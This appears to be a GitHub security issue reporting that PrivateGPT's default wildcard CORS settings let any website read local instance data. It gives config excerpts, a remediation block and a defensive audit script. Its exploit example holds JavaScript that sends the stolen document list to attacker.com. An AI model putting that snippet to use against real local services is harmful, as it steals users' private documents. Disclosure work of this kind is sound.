
[SECURITY] Wildcard CORS Configuration Enables Cross-Origin Attacks #2194

@allsmog

Description


Security Vulnerability Report

Severity: HIGH (CVSS 8.1)
CWE: CWE-942 (Permissive Cross-domain Policy with Untrusted Domains)

Summary

Default CORS configuration allows requests from ANY origin with any method and header. This enables cross-site request forgery attacks against local PrivateGPT instances.

Vulnerability Details

File: private_gpt/launcher.py:46-55
Config: settings.yaml:8-11

Vulnerable Configuration (DEFAULT)

# settings.yaml:8-11
cors:
  enabled: true
  allow_origins: ["*"]    # ANY website can make requests
  allow_methods: ["*"]
  allow_headers: ["*"]

Attack Scenario

  1. Victim runs PrivateGPT locally on localhost:8001
  2. Victim visits attacker's malicious website
  3. Attacker's JavaScript makes cross-origin requests to localhost:8001
  4. Attacker extracts all documents or poisons knowledge base

Exploit Example

// On attacker's website
fetch('http://localhost:8001/v1/ingest/list')
  .then(r => r.json())
  .then(data => {
    // Send stolen document list to attacker
    fetch('https://attacker.com/steal', {
      method: 'POST',
      body: JSON.stringify(data)
    });
  });

Impact

  • Cross-origin document theft from local instances
  • CSRF attacks to poison knowledge base
  • Session hijacking if auth cookies are used

Remediation

cors:
  enabled: true
  allow_origins: ["http://localhost:8001"]  # Restrict to known origins
  allow_methods: ["GET", "POST"]
  allow_headers: ["Content-Type", "Authorization"]
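To make the difference between the default and the remediated block concrete, here is an added example (not PrivateGPT's own code) that audits a `cors:` settings block for over-permissive values and models which request Origin a browser would be allowed to read responses from. The keys match the settings.yaml excerpt above; `allow_credentials` is an assumed optional key, included because its combination with a wildcard origin is the riskiest case.

```python
# Added example (not PrivateGPT's own code): audit a `cors:` settings block
# like the one in settings.yaml and model which Origin values a browser
# would be allowed to read responses from. `allow_credentials` is an assumed
# optional key; the other keys match the report's settings.yaml excerpt.
from typing import Dict, List, Optional

def audit_cors(cors: Dict) -> List[str]:
    """Return a list of findings for an over-permissive CORS block."""
    findings: List[str] = []
    if not cors.get("enabled", False):
        return findings  # middleware not installed; nothing to audit
    origins = cors.get("allow_origins", [])
    if "*" in origins:
        findings.append("allow_origins contains '*': any site can read responses")
        if cors.get("allow_credentials", False):
            findings.append("allow_credentials with '*' origin: cookies/auth reusable cross-site")
    for key in ("allow_methods", "allow_headers"):
        if "*" in cors.get(key, []):
            findings.append(f"{key} contains '*': preflight checks are disabled")
    for origin in origins:
        if origin != "*" and (not origin.startswith(("http://", "https://")) or origin.endswith("/")):
            findings.append(f"malformed origin {origin!r}: must be scheme://host[:port] with no path")
    return findings

def allowed_origin_header(cors: Dict, request_origin: str) -> Optional[str]:
    """Simplified model of the decision a CORS middleware makes: the value it
    would send in Access-Control-Allow-Origin, or None when the browser must
    block the cross-origin read."""
    if not cors.get("enabled", False):
        return None
    origins = cors.get("allow_origins", [])
    if "*" in origins and not cors.get("allow_credentials", False):
        return "*"  # echoing '*' lets every origin read the body
    if request_origin in origins:
        return request_origin
    return None

# Constructed samples: the report's default block and its remediation.
VULNERABLE = {"enabled": True, "allow_origins": ["*"],
              "allow_methods": ["*"], "allow_headers": ["*"]}
FIXED = {"enabled": True, "allow_origins": ["http://localhost:8001"],
         "allow_methods": ["GET", "POST"],
         "allow_headers": ["Content-Type", "Authorization"]}

if __name__ == "__main__":
    for name, cfg in (("default", VULNERABLE), ("remediated", FIXED)):
        print(name, audit_cors(cfg) or "OK")
        print("  third-party site may read responses:",
              allowed_origin_header(cfg, "https://third-party.example") is not None)
```

Running it shows three findings for the default block and none for the remediated one, and only the configured localhost origin is granted a readable response.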

Researcher

Name: Shayaun Nejad
Credentials: OSCE3 (OSEP, OSWE, OSED), OSCP, CISSP
Affiliation: Product Security Engineer at Rubrik

Requesting 90-day disclosure timeline.
